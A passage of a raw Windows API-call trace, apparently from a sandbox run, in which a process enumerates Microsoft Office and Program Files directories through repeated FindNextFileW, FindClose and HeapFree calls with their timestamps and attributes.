ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0170.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.953] FindNextFileW (in: hFindFile=0x727b08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a65087, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5a65087, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5a65087, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0170.953] FindClose (in: hFindFile=0x727b08 | out: hFindFile=0x727b08) returned 1 [0170.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.953] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a65087, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5a65087, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5a65087, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.Access.BusinessDataCatalog", cAlternateFileName="MICROS~1.BUS")) returned 0 [0170.953] FindClose (in: hFindFile=0x727948 | out: hFindFile=0x727948) returned 1 [0170.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.953] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GAC_MSIL", cAlternateFileName="")) returned 1 [0170.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.954] FindNextFileW (in: hFindFile=0x727748, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a56cbe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a56cbe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.0.0.0__89845DCD8080CC91", cAlternateFileName="1100~1.0__")) returned 0 [0170.954] FindClose (in: hFindFile=0x727748 | out: hFindFile=0x727748) returned 1 [0170.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.954] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd2face, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.AnalysisServices.SPClient.Interfaces", cAlternateFileName="MICROS~2.INT")) returned 1 [0170.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.954] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd2face, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbd2face, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbd2face, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.0.0.0__89845DCD8080CC91", cAlternateFileName="1100~1.0__")) returned 0 [0170.954] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0170.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.954] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22d01df, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.BusinessData", cAlternateFileName="MICROS~1.BUS")) returned 1 [0170.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.955] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22d01df, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22d01df, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0170.955] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0170.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.955] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessApplications.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0170.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.955] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x863456d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0170.955] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0170.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.955] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessData", cAlternateFileName="MICROS~2.BUS")) returned 1 [0170.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.956] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0170.956] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0170.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.956] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d97f24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessData.Intl", cAlternateFileName="MICROS~1.INT")) returned 1 [0170.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.956] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e918 | out: lpFindFileData=0x3b3e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d97f24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0170.956] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0170.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.956] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d97f24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d97f24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.BusinessData.Intl", cAlternateFileName="MICROS~1.INT")) returned 0 [0170.956] FindClose (in: hFindFile=0x727948 | out: hFindFile=0x727948) returned 1 [0170.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.957] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GAC_MSIL", cAlternateFileName="")) returned 0 [0170.957] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.959] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="INF", cAlternateFileName="")) returned 1 [0170.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.959] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc26abeaf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc369dacd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc369dacd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Installer", cAlternateFileName="INSTAL~1")) returned 1 [0170.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.961] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2f507b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2f507b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2f507b2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-001F-0409-1000-0000000FF1CE}", cAlternateFileName="{90160~3")) returned 1 [0170.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.962] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc369dacd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc369dacd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc369dacd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-001F-040C-1000-0000000FF1CE}", cAlternateFileName="{90160~4")) returned 1 [0170.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.962] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc369dacd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc369dacd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc369dacd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-001F-0C0A-1000-0000000FF1CE}", cAlternateFileName="{9B17A~1")) returned 1 [0170.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.963] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc28c2111, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc28c2111, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc28c2111, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-006E-0409-1000-0000000FF1CE}", cAlternateFileName="{90160~2")) returned 1 [0170.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.963] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc28c2111, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc28c2111, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc28c2111, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90160000-006E-0409-1000-0000000FF1CE}", cAlternateFileName="{90160~2")) returned 0 [0170.963] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.964] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e24d55a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e24d55a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e273816, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PCHEALTH", cAlternateFileName="")) returned 1 [0170.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.966] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e299a0e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e299a0e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e299a0e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="QSIGNOFF", cAlternateFileName="")) returned 1 [0170.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.966] FindNextFileW (in: hFindFile=0x727a48, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e299a0e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e299a0e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e299a0e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="QSIGNOFF", cAlternateFileName="")) returned 0 [0170.966] FindClose (in: hFindFile=0x727a48 | out: hFindFile=0x727a48) returned 1 [0170.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0170.967] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e273816, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e299a0e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e299a0e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERRORREP", cAlternateFileName="")) returned 0 [0170.967] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0170.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.967] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2daddbf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b285e60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b285e60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SHELLNEW", cAlternateFileName="")) returned 1 [0171.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0171.129] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2daddbf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b285e60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b285e60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SHELLNEW", cAlternateFileName="")) returned 0 [0171.129] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0171.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0171.130] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0171.130] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0171.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.141] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VFS", cAlternateFileName="")) returned 0 [0171.141] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0171.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0171.142] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 0 [0171.142] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0171.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bfb0 | out: hHeap=0x6a0000) returned 1 [0171.142] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e68d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82e68d8a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x82e68d8a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Microsoft Office 15", cAlternateFileName="MICROS~1")) returned 1 [0171.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.142] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82e68d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82e68d8a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x82e8efda, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClientX64", cAlternateFileName="CLIENT~1")) returned 0 [0171.143] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0171.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0171.143] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe99e772e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe530b7f4, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe530b7f4, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0171.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0171.234] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd77219, ftCreationTime.dwHighDateTime=0x1d327c9, 